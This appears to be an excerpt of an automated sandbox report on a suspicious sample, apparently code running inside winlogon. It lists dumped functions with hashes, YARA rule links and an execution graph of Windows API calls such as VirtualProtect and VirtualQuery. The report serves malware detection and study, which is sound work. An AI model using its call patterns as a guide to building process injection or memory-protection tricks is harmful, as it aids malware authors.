                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction ID: dc5de42c1dc400c54a34142e8686c4d9b9fee3a7d214c8df3c00669743a542fc
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 357190362207C2CAE7259EA6E8443EEF795FB89B84F440037DD0E53B89DE35D6458B00
                                                                          Function 000001E8589B9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 479c25fd653139756ea47a74aec904b6b413ad4f2ed2086552f17bedce541712
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: EC614632A29B84CAEB20DF65D4403DDB7A0FB49B99F144226EE4D17B98EF38D595C700
                                                                          Function 000001E858959E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 094ec712c1b288e37f31cb4837e425075fcca7128a69f700356e5ae3858f6197
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: A1612632A25B84CAEB20DF65E4403DDB7A0FB45B89F144226EE4D17B99DF38D595CB00
                                                                          Function 000001E858982330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction ID: 414b1109d79ba0e870cecf76c2af5f31b5d4bde43533dd6e83f510ec87595dfc
                                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction Fuzzy Hash: 6951BD322287C2C1F664DAAAE4983EEF791FB95780F450137DE5E03B99DE39C9048B50
                                                                          Function 000001E8589926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: dcdd8cd598e05c42887886c746ddf0c279423bf44c0c1bf9e557dc900a05699c
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 2A416072625A80C6EB209F65E4443EDF7A2FB98794F514032EE4E87794EF38C441C740
                                                                          Function 000001E8589894A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: 449c3b8d4a9707330a2244a19cbde2a29dd6a88ab94e040f38e9f4c0bfe6f638
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 5F110A36224B8182EB618F25F44439DB7E5FB88B94F584226EE8D47B69DF3CC551CB00
                                                                          Function 000001E8589B7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 0e26cef9ba68d931c57e211af9cd086a3cc8b9350f618ba4ce6d2e1c4988f689
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: 2AE08671650B84D4DF018F21E8802DC73A4EF58B64B8891339D5C06311FE38D1E9C300
                                                                          Function 000001E858957356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: b226c5ef1287e80dd1a639188cd00b7be9ee93c87761d6bca3fa593d7edb1d27
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: 32E04F61660B84D0DB058F22E8412D873A09F58B64F8891229D5C06311EE38D1E9C300
                                                                          Function 000001E8589B73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: ebbb92f6b71bc6aeecd0247755a998ea3fb1c1d57f03a5a9e81a6553625eb14e
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: FDE08C71A20B88C4DF028F21E8802DCB3A4EF68B68F889133CE4C06311EE38D1E9C300
                                                                          Function 000001E8589573B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: d79e25d1bddce505cbefe66c1f7dc3f1dcce17b3d3d0eb5f19f21b045c52fa15
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 4AE0B661A61B88D4DB068F62E8912D8B3A5AB68B64FC89122DE5C56355EE38D1E9C300
                                                                          Function 000001E858981BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: bae03b9de4d8a0968d4e15549a5e41e9ffeeedaf31b7d182c916321c4c0c0085
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 4E113D35721BC5C1EA55DB66E8042ADB7A1FB89FC0F184036DE4D57765DE38C4428700
                                                                          Function 000001E858981268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: bf3232b7a1a84d483810c562108e731f4be810f9750f62d4ac0e33b9570d4307
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: D6E03935721684C6EB158BA2D80838ABAE2EB89B46F0480258D0907361EF7D8499C750

                                                                          Execution Graph

                                                                          Execution Coverage:4.8%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:1467
                                                                          Total number of Limit Nodes:2
                                                                          execution_graph 4099 7ff72af2219e 4100 7ff72af221ab EnterCriticalSection 4099->4100 4101 7ff72af22272 4099->4101 4102 7ff72af22265 LeaveCriticalSection 4100->4102 4104 7ff72af221c8 4100->4104 4102->4101 4103 7ff72af221e9 TlsGetValue GetLastError 4103->4104 4104->4102 4104->4103 2640 7ff72af21140 2643 7ff72af21160 2640->2643 2642 7ff72af21156 2644 7ff72af211b9 2643->2644 2645 7ff72af2118b 2643->2645 2647 7ff72af211c7 _amsg_exit 2644->2647 2648 7ff72af211d3 2644->2648 2645->2644 2646 7ff72af21190 2645->2646 2646->2644 2649 7ff72af211a0 Sleep 2646->2649 2647->2648 2650 7ff72af2121a 2648->2650 2651 7ff72af21201 _initterm 2648->2651 2649->2644 2649->2646 2668 7ff72af21880 2650->2668 2651->2650 2654 7ff72af2126a 2655 7ff72af2126f malloc 2654->2655 2656 7ff72af2128b 2655->2656 2659 7ff72af212d2 2655->2659 2657 7ff72af212a0 strlen malloc memcpy 2656->2657 2657->2657 2658 7ff72af212d0 2657->2658 2658->2659 2681 7ff72af23f70 2659->2681 2662 7ff72af21344 2666 7ff72af21160 101 API calls 2662->2666 2663 7ff72af21324 2664 7ff72af21338 2663->2664 2665 7ff72af2132d _cexit 2663->2665 2664->2642 2665->2664 2667 7ff72af21366 2666->2667 2667->2642 2669 7ff72af21247 SetUnhandledExceptionFilter 2668->2669 2670 7ff72af218a2 2668->2670 2669->2654 2670->2669 2671 7ff72af2194d 2670->2671 2677 7ff72af21a20 2670->2677 2672 7ff72af2199e 2671->2672 2673 7ff72af21956 2671->2673 2672->2669 2676 7ff72af219e9 VirtualProtect 2672->2676 2673->2672 2856 7ff72af21ba0 2673->2856 2674 7ff72af21b5c 2676->2672 2677->2672 2677->2674 2678 7ff72af21b36 2677->2678 2679 7ff72af21ba0 4 API calls 2678->2679 2680 7ff72af21b53 2679->2680 2680->2674 2684 7ff72af23f86 2681->2684 2682 7ff72af24079 wcslen 2866 7ff72af2153f 2682->2866 2684->2682 2688 7ff72af24179 2691 7ff72af24193 memset wcscat memset 2688->2691 2694 7ff72af241ec 2691->2694 2693 7ff72af2423c wcslen 2695 7ff72af2424e 2693->2695 2699 7ff72af2428c 2693->2699 2694->2693 2696 7ff72af24260 _wcsnicmp 2695->2696 2697 7ff72af24276 wcslen 2696->2697 2696->2699 2697->2696 2697->2699 2698 7ff72af242ed wcscpy wcscat memset 2701 7ff72af2432c 2698->2701 2699->2698 2700 7ff72af24434 wcscpy wcscat 2702 7ff72af2445f memset 2700->2702 2706 7ff72af24541 2700->2706 2701->2700 2703 7ff72af24480 2702->2703 2704 7ff72af244e5 wcslen 2703->2704 2705 7ff72af244fb 2704->2705 2713 7ff72af2453c 2704->2713 2708 7ff72af24510 _wcsnicmp 2705->2708 3002 7ff72af22df0 2706->3002 2709 7ff72af24526 wcslen 2708->2709 2708->2713 2709->2708 2709->2713 2710 7ff72af2472e wcscpy wcscat _wcsicmp 2711 7ff72af2477b memset 2710->2711 2712 7ff72af24762 2710->2712 2715 7ff72af2479c 2711->2715 3014 7ff72af214d6 2712->3014 2713->2710 2716 7ff72af247e1 wcscpy wcscat memset 2715->2716 2717 7ff72af24827 2716->2717 2718 7ff72af24877 wcscpy wcscat memset 2717->2718 2720 7ff72af248bd 2718->2720 2719 7ff72af248ed wcscpy wcscat 2721 7ff72af26b3d memcpy 2719->2721 2722 7ff72af2491f 2719->2722 2720->2719 2721->2722 2723 7ff72af22df0 10 API calls 2722->2723 2724 7ff72af24ace 2723->2724 2725 7ff72af22df0 10 API calls 2724->2725 2726 7ff72af24be2 memset 2725->2726 2727 7ff72af24c03 2726->2727 2728 7ff72af24c46 wcscpy wcscat memset 2727->2728 2729 7ff72af24c8f 2728->2729 2730 7ff72af24cd2 wcscpy wcscat wcslen 2729->2730 3055 7ff72af2146d 2730->3055 2733 7ff72af24de3 2736 7ff72af24ed9 wcslen 2733->2736 2742 7ff72af250cb 2733->2742 3183 7ff72af2157b 2736->3183 2737 7ff72af2145e malloc 2737->2733 2741 7ff72af250aa memset 2741->2742 2744 7ff72af2513b wcscpy wcscat 2742->2744 2743 7ff72af2503d wcslen 3215 7ff72af215e4 2743->3215 2748 7ff72af25166 2744->2748 2746 7ff72af24f97 2746->2741 2746->2743 2749 7ff72af22df0 10 API calls 2748->2749 2752 7ff72af2526e 2749->2752 2750 7ff72af2145e malloc 2750->2741 2751 7ff72af22df0 10 API calls 2753 7ff72af25383 2751->2753 2752->2751 2754 7ff72af22df0 10 API calls 2753->2754 2755 7ff72af2546d 2754->2755 2756 7ff72af22df0 10 API calls 2755->2756 2757 7ff72af25557 memset 2756->2757 2759 7ff72af25578 2757->2759 2758 7ff72af255f7 wcscpy wcscat 3218 7ff72af238b0 memset 2758->3218 2759->2758 2762 7ff72af257f2 3343 7ff72af22f70 2762->3343 2766 7ff72af2580d 3347 7ff72af23b80 2766->3347 2767 7ff72af2569a strcpy 2771 7ff72af256c1 2767->2771 2768 7ff72af257d2 2770 7ff72af214c7 malloc 2768->2770 2770->2762 2773 7ff72af2572a strstr 2771->2773 2775 7ff72af2579c 2773->2775 2781 7ff72af2573e 2773->2781 2774 7ff72af214c7 malloc 2777 7ff72af25865 2774->2777 3284 7ff72af23350 memset 2775->3284 2778 7ff72af25873 2777->2778 2783 7ff72af2145e malloc 2777->2783 2779 7ff72af21503 malloc 2778->2779 2784 7ff72af258a6 2779->2784 2782 7ff72af25773 strcat strcat 2781->2782 2782->2775 2783->2778 2786 7ff72af258e1 2784->2786 3370 7ff72af2154e 2784->3370 2789 7ff72af26e6b memcpy 2786->2789 2790 7ff72af258fe 2786->2790 2789->2790 2792 7ff72af25a6b wcslen 2790->2792 2791 7ff72af2145e malloc 2791->2786 2793 7ff72af2157b malloc 2792->2793 2794 7ff72af25af2 2793->2794 2795 7ff72af25afa memset 2794->2795 2799 7ff72af25c0c 2794->2799 2797 7ff72af25b1b 2795->2797 2796 7ff72af25b6b wcslen 3393 7ff72af215a8 2796->3393 2797->2796 2800 7ff72af22df0 10 API calls 2799->2800 2809 7ff72af25e70 _wcsicmp 2799->2809 2802 7ff72af25d33 2800->2802 2805 7ff72af26f24 memcpy 2802->2805 2807 7ff72af25d40 2802->2807 2803 7ff72af25bdb _wcsnicmp 2804 7ff72af25c00 2803->2804 2811 7ff72af261f1 2803->2811 2806 7ff72af2145e malloc 2804->2806 2805->2807 2806->2799 2808 7ff72af22df0 10 API calls 2807->2808 2808->2809 2812 7ff72af25e8b 2809->2812 2819 7ff72af2607f 2809->2819 2810 7ff72af2624e wcslen 2813 7ff72af215a8 malloc 2810->2813 2811->2810 2814 7ff72af238b0 5 API calls 2812->2814 2815 7ff72af262aa 2813->2815 2816 7ff72af25e9e 2814->2816 2817 7ff72af2145e malloc 2815->2817 2818 7ff72af23350 10 API calls 2816->2818 2817->2799 2821 7ff72af25ebb 2818->2821 3404 7ff72af23df0 2819->3404 2822 7ff72af214c7 malloc 2821->2822 2827 7ff72af25ee6 2822->2827 2823 7ff72af26199 wcslen 2824 7ff72af261af 2823->2824 2834 7ff72af261ec 2823->2834 2826 7ff72af261c0 _wcsnicmp 2824->2826 2825 7ff72af2613c 2825->2823 2829 7ff72af261d6 wcslen 2826->2829 2826->2834 2828 7ff72af22df0 10 API calls 2827->2828 2836 7ff72af25f6f 2828->2836 2829->2826 2829->2834 2830 7ff72af26357 memset wcscpy wcscat 2831 7ff72af22f70 malloc 2830->2831 2832 7ff72af263ab 2831->2832 2835 7ff72af23350 10 API calls 2832->2835 2833 7ff72af22df0 10 API calls 2837 7ff72af21315 2833->2837 2834->2830 2838 7ff72af263c3 2835->2838 2836->2833 2837->2662 2837->2663 2839 7ff72af214c7 malloc 2838->2839 2840 7ff72af263f1 memset 2839->2840 2841 7ff72af26412 2840->2841 2842 7ff72af26462 wcslen 2841->2842 2843 7ff72af264a7 wcscat memset 2842->2843 2844 7ff72af26474 2842->2844 2849 7ff72af264e1 2843->2849 2845 7ff72af26480 _wcsnicmp 2844->2845 2845->2843 2847 7ff72af26492 wcslen 2845->2847 2847->2843 2847->2845 2848 7ff72af26531 wcscpy wcscat 2850 7ff72af26566 2848->2850 2849->2848 2851 7ff72af272a3 memcpy 2850->2851 2852 7ff72af266a3 2850->2852 2851->2852 2853 7ff72af23df0 11 API calls 2852->2853 2854 7ff72af2684f 2853->2854 2855 7ff72af2145e malloc 2854->2855 2855->2837 2858 7ff72af21bc2 2856->2858 2857 7ff72af21c04 memcpy 2857->2673 2858->2857 2860 7ff72af21c45 VirtualQuery 2858->2860 2861 7ff72af21cf4 2858->2861 2860->2861 2862 7ff72af21c72 2860->2862 2863 7ff72af21d23 GetLastError 2861->2863 2862->2857 2865 7ff72af21ca4 VirtualProtect 2862->2865 2864 7ff72af21d37 2863->2864 2865->2857 2865->2863 3420 7ff72af21394 2866->3420 2868 7ff72af2154e 2869 7ff72af21394 malloc 2868->2869 2870 7ff72af2155d 2869->2870 2871 7ff72af21394 malloc 2870->2871 2872 7ff72af2156c 2871->2872 2873 7ff72af21394 malloc 2872->2873 2874 7ff72af2157b 2873->2874 2875 7ff72af21394 malloc 2874->2875 2876 7ff72af2158a 2875->2876 2877 7ff72af21394 malloc 2876->2877 2878 7ff72af21599 2877->2878 2879 7ff72af21394 malloc 2878->2879 2880 7ff72af215a8 2879->2880 2881 7ff72af21394 malloc 2880->2881 2882 7ff72af215b7 2881->2882 2883 7ff72af21394 malloc 2882->2883 2884 7ff72af215c6 2883->2884 2885 7ff72af21394 malloc 2884->2885 2886 7ff72af215d5 2885->2886 2887 7ff72af21394 malloc 2886->2887 2888 7ff72af215e4 2887->2888 2889 7ff72af21394 malloc 2888->2889 2890 7ff72af215f3 2889->2890 2890->2837 2891 7ff72af21503 2890->2891 2892 7ff72af21394 malloc 2891->2892 2893 7ff72af21512 2892->2893 2894 7ff72af21394 malloc 2893->2894 2895 7ff72af21521 2894->2895 2896 7ff72af21530 2895->2896 2897 7ff72af21394 malloc 2895->2897 2898 7ff72af21394 malloc 2896->2898 2897->2896 2899 7ff72af2153a 2898->2899 2900 7ff72af21394 malloc 2899->2900 2901 7ff72af2153f 2900->2901 2902 7ff72af21394 malloc 2901->2902 2903 7ff72af2154e 2902->2903 2904 7ff72af21394 malloc 2903->2904 2905 7ff72af2155d 2904->2905 2906 7ff72af21394 malloc 2905->2906 2907 7ff72af2156c 2906->2907 2908 7ff72af21394 malloc 2907->2908 2909 7ff72af2157b 2908->2909 2910 7ff72af21394 malloc 2909->2910 2911 7ff72af2158a 2910->2911 2912 7ff72af21394 malloc 2911->2912 2913 7ff72af21599 2912->2913 2914 7ff72af21394 malloc 2913->2914 2915 7ff72af215a8 2914->2915 2916 7ff72af21394 malloc 2915->2916 2917 7ff72af215b7 2916->2917 2918 7ff72af21394 malloc 2917->2918 2919 7ff72af215c6 2918->2919 2920 7ff72af21394 malloc 2919->2920 2921 7ff72af215d5 2920->2921 2922 7ff72af21394 malloc 2921->2922 2923 7ff72af215e4 2922->2923 2924 7ff72af21394 malloc 2923->2924 2925 7ff72af215f3 2924->2925 2925->2688 2926 7ff72af2156c 2925->2926 2927 7ff72af21394 malloc 2926->2927 2928 7ff72af2157b 2927->2928 2929 7ff72af21394 malloc 2928->2929 2930 7ff72af2158a 2929->2930 2931 7ff72af21394 malloc 2930->2931 2932 7ff72af21599 2931->2932 2933 7ff72af21394 malloc 2932->2933 2934 7ff72af215a8 2933->2934 2935 7ff72af21394 malloc 2934->2935 2936 7ff72af215b7 2935->2936 2937 7ff72af21394 malloc 2936->2937 2938 7ff72af215c6 2937->2938 2939 7ff72af21394 malloc 2938->2939 2940 7ff72af215d5 2939->2940 2941 7ff72af21394 malloc 2940->2941 2942 7ff72af215e4 2941->2942 2943 7ff72af21394 malloc 2942->2943 2944 7ff72af215f3 2943->2944 2944->2688 2945 7ff72af2145e 2944->2945 2946 7ff72af21394 malloc 2945->2946 2947 7ff72af2146d 2946->2947 2948 7ff72af21394 malloc 2947->2948 2949 7ff72af2147c 2948->2949 2950 7ff72af21394 malloc 2949->2950 2951 7ff72af2148b 2950->2951 2952 7ff72af21394 malloc 2951->2952 2953 7ff72af2149a 2952->2953 2954 7ff72af21394 malloc 2953->2954 2955 7ff72af214a9 2954->2955 2956 7ff72af21394 malloc 2955->2956 2957 7ff72af214b8 2956->2957 2958 7ff72af21394 malloc 2957->2958 2959 7ff72af214c7 2958->2959 2960 7ff72af21394 malloc 2959->2960 2961 7ff72af214d6 2960->2961 2962 7ff72af21394 malloc 2961->2962 2963 7ff72af214e5 2962->2963 2964 7ff72af21394 malloc 2963->2964 2965 7ff72af214f4 2964->2965 2966 7ff72af21394 malloc 2965->2966 2967 7ff72af21503 2966->2967 2968 7ff72af21394 malloc 2967->2968 2969 7ff72af21512 2968->2969 2970 7ff72af21394 malloc 2969->2970 2971 7ff72af21521 2970->2971 2972 7ff72af21530 2971->2972 2973 7ff72af21394 malloc 2971->2973 2974 7ff72af21394 malloc 2972->2974 2973->2972 2975 7ff72af2153a 2974->2975 2976 7ff72af21394 malloc 2975->2976 2977 7ff72af2153f 2976->2977 2978 7ff72af21394 malloc 2977->2978 2979 7ff72af2154e 2978->2979 2980 7ff72af21394 malloc 2979->2980 2981 7ff72af2155d 2980->2981 2982 7ff72af21394 malloc 2981->2982 2983 7ff72af2156c 2982->2983 2984 7ff72af21394 malloc 2983->2984 2985 7ff72af2157b 2984->2985 2986 7ff72af21394 malloc 2985->2986 2987 7ff72af2158a 2986->2987 2988 7ff72af21394 malloc 2987->2988 2989 7ff72af21599 2988->2989 2990 7ff72af21394 malloc 2989->2990 2991 7ff72af215a8 2990->2991 2992 7ff72af21394 malloc 2991->2992 2993 7ff72af215b7 2992->2993 2994 7ff72af21394 malloc 2993->2994 2995 7ff72af215c6 2994->2995 2996 7ff72af21394 malloc 2995->2996 2997 7ff72af215d5 2996->2997 2998 7ff72af21394 malloc 2997->2998 2999 7ff72af215e4 2998->2999 3000 7ff72af21394 malloc 2999->3000 3001 7ff72af215f3 3000->3001 3001->2688 3429 7ff72af22660 3002->3429 3007 7ff72af2145e malloc 3009 7ff72af22f35 3007->3009 3008 7ff72af22e3c 3431 7ff72af22690 3008->3431 3010 7ff72af22f53 3009->3010 3464 7ff72af21512 3009->3464 3011 7ff72af2145e malloc 3010->3011 3013 7ff72af22f5d 3011->3013 3013->2837 3015 7ff72af21394 malloc 3014->3015 3016 7ff72af214e5 3015->3016 3017 7ff72af21394 malloc 3016->3017 3018 7ff72af214f4 3017->3018 3019 7ff72af21394 malloc 3018->3019 3020 7ff72af21503 3019->3020 3021 7ff72af21394 malloc 3020->3021 3022 7ff72af21512 3021->3022 3023 7ff72af21394 malloc 3022->3023 3024 7ff72af21521 3023->3024 3025 7ff72af21530 3024->3025 3026 7ff72af21394 malloc 3024->3026 3027 7ff72af21394 malloc 3025->3027 3026->3025 3028 7ff72af2153a 3027->3028 3029 7ff72af21394 malloc 3028->3029 3030 7ff72af2153f 3029->3030 3031 7ff72af21394 malloc 3030->3031 3032 7ff72af2154e 3031->3032 3033 7ff72af21394 malloc 3032->3033 3034 7ff72af2155d 3033->3034 3035 7ff72af21394 malloc 3034->3035 3036 7ff72af2156c 3035->3036 3037 7ff72af21394 malloc 3036->3037 3038 7ff72af2157b 3037->3038 3039 7ff72af21394 malloc 3038->3039 3040 7ff72af2158a 3039->3040 3041 7ff72af21394 malloc 3040->3041 3042 7ff72af21599 3041->3042 3043 7ff72af21394 malloc 3042->3043 3044 7ff72af215a8 3043->3044 3045 7ff72af21394 malloc 3044->3045 3046 7ff72af215b7 3045->3046 3047 7ff72af21394 malloc 3046->3047 3048 7ff72af215c6 3047->3048 3049 7ff72af21394 malloc 3048->3049 3050 7ff72af215d5 3049->3050 3051 7ff72af21394 malloc 3050->3051 3052 7ff72af215e4 3051->3052 3053 7ff72af21394 malloc 3052->3053 3054 7ff72af215f3 3053->3054 3054->2711 3056 7ff72af21394 malloc 3055->3056 3057 7ff72af2147c 3056->3057 3058 7ff72af21394 malloc 3057->3058 3059 7ff72af2148b 3058->3059 3060 7ff72af21394 malloc 3059->3060 3061 7ff72af2149a 3060->3061 3062 7ff72af21394 malloc 3061->3062 3063 7ff72af214a9 3062->3063 3064 7ff72af21394 malloc 3063->3064 3065 7ff72af214b8 3064->3065 3066 7ff72af21394 malloc 3065->3066 3067 7ff72af214c7 3066->3067 3068 7ff72af21394 malloc 3067->3068 3069 7ff72af214d6 3068->3069 3070 7ff72af21394 malloc 3069->3070 3071 7ff72af214e5 3070->3071 3072 7ff72af21394 malloc 3071->3072 3073 7ff72af214f4 3072->3073 3074 7ff72af21394 malloc 3073->3074 3075 7ff72af21503 3074->3075 3076 7ff72af21394 malloc 3075->3076 3077 7ff72af21512 3076->3077 3078 7ff72af21394 malloc 3077->3078 3079 7ff72af21521 3078->3079 3080 7ff72af21530 3079->3080 3081 7ff72af21394 malloc 3079->3081 3082 7ff72af21394 malloc 3080->3082 3081->3080 3083 7ff72af2153a 3082->3083 3084 7ff72af21394 malloc 3083->3084 3085 7ff72af2153f 3084->3085 